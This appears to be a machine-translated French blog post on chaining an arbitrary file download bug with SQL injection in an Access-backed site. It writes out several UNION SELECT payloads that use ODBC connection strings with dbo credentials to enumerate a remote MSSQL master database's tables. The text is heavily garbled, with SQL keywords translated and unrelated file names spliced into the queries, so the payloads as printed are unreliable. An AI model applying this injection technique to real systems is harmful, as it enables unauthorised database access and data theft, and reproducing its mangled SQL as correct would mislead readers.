Premier point, cette méthode a été il ya longtemps, mais sans doute dans la tête avec un temps de calme pendant trop longtemps, déjà dans l'état oubliés. Merci d'information Trace. Souvent, face à la vulnérabilité arbitraires télécharger le fichier, la méthode générale de traitement est de retourner la connexion de base de données fichier à télécharger, puis la connexion à distance.
Souvent, face à la vulnérabilité arbitraires télécharger le fichier, la méthode générale de traitement est de retourner la connexion de base de données fichier à télécharger, puis allez jusqu'à la connexion à distance. état idéal que MSSQL et MySQL, en particulier dans la base de données et le Web n'est pas le cas de séparation, de sauvegarde SHELL, l'exportation SHELL, peuvent être utilisées de plusieurs façons.
Mais si la base de données et la séparation du Web, mais ne peut pas accéder à la base de données, y compris le réseau, ou d'autres moyens de faire un pare-feu si on ne peut pas se connecter à la base de données à distance, on peut supposer que certains des re difficile, sinon impossible de trouver un point d'injection MSSQL, dans de nombreux cas généralement impuissants.
Ici pour MSSQL à titre d'exemple, il est arrivé à trouver une vulnérabilité fichier arbitraire télécharger, directement sous le Web.Config de revenir pour voir, y compris base de données de découverte de réseau, de trouver une demi-journée n'a pas trouvé le point d'injection, une note peu marginal, est-il un point quelconque, c'est malheureusement le ACCESS base de données. Devinez la table et le dos. Toutefois, la station cible de fond est connue, prêt à lire à partir du point d'accès de l'administrateur du compte cible point d'injection. Certains intuitive, étant donné directement ci-dessous les résultats de mon test local:
Obtenez un simple point, trois domaines, ID, XM, XB, tapez le numéro d'identification, suivi de deux caractères.
Supposons qu'il y ait des lacunes dans le document, la mise en œuvre de l'instruction SQL Select bin conf de sauvegarde des données de configuration generate.sh eshow_sitemap.html journal maint tmp svn sitemap.html de whrere test id = 1
Il ya trois domaines, nous utilisons l'enquête conjointe de l'Union pour correspondre à ce qu'il est (opération «boîte noire» à l'ordre par les champs ou pour déterminer le nombre de la force brute)
SELECT conf bin sauvegarde des données de configuration generate.sh eshow_sitemap.html journal maint essai sitemap.html depuis SVN tmp où id = 999999 union select top 1 1,2, le nom de [ODBC; Driver = SQL Server; UID = dbo; PWD = dba ;] Server = =*****; base de données master. ku
Voici la base de données master, j'ai créé une table nommée KU-dessus de cette requête, puisque id = 999999 n'existe pas sous l'action de l'enquête conjointe de contenu Web, à l'émission initiale de la situation de l'accès base de données montrent de notre structure résultats de la requête UNION, le nom du champ dans une position d'affichage de caractères.
ku contenu de cette table le champ du nom sera affiché dans le site Web sur la position correspondante, mais ce n'est clairement pas ce que nous voulons, nous voulons que la structure de la table entière et le contenu
Pour maîtriser à titre d'exemple, voici les résultats de simulation, à l'avance que je connais déjà la structure du maître, pratique et les résultats seront comparés à la somme de contrôle est erronée.
SELECT conf bin sauvegarde des données de configuration generate.sh eshow_sitemap.html journal maint essai sitemap.html depuis SVN tmp où id = 999999 union select top 1 1,2, table_name de [ODBC; Driver = SQL Server; UID = dbo; PWD = dba INFORMATION_SCHEMA.TABLES;] Server = =*****; base de données master.
Le nom de la table principale base de données de sa sortie.
Derrière le nom de la table est simple.
SELECT conf bin sauvegarde des données de configuration generate.sh eshow_sitemap.html journal maint essai sitemap.html depuis SVN tmp où id = 999999 union select top 1 1,2, table_name de [ODBC; Driver = SQL Server; UID = dbo; PWD = dba ;] Server = =*****; base de données master. INFORMATION_SCHEMA.TABLES où nom_table pas (en haut de sélectionner 1 nom_table [ODBC; Driver = SQL Server; UID = dbo; PWD = dba; Server =****; ] = base de données principale. INFORMATION_SCHEMA.TABLES)
classe race inférieure à pousser méthode conventionnelle pour obtenir des noms sur le terrain et le contenu des champs du code sous leur propre lourdeur.
Si la base de données où l'ID est un caractère, puis
SELECT conf bin sauvegarde des données de configuration generate.sh eshow_sitemap.html journal maint essai sitemap.html depuis SVN tmp où id = '999999 'union select top 1 1,2, table_name de [ODBC; Driver = SQL Server; UID = dbo; PWD = dba;] Server = =***; base de données master. INFORMATION_SCHEMA.TABLES où '1 '= '1'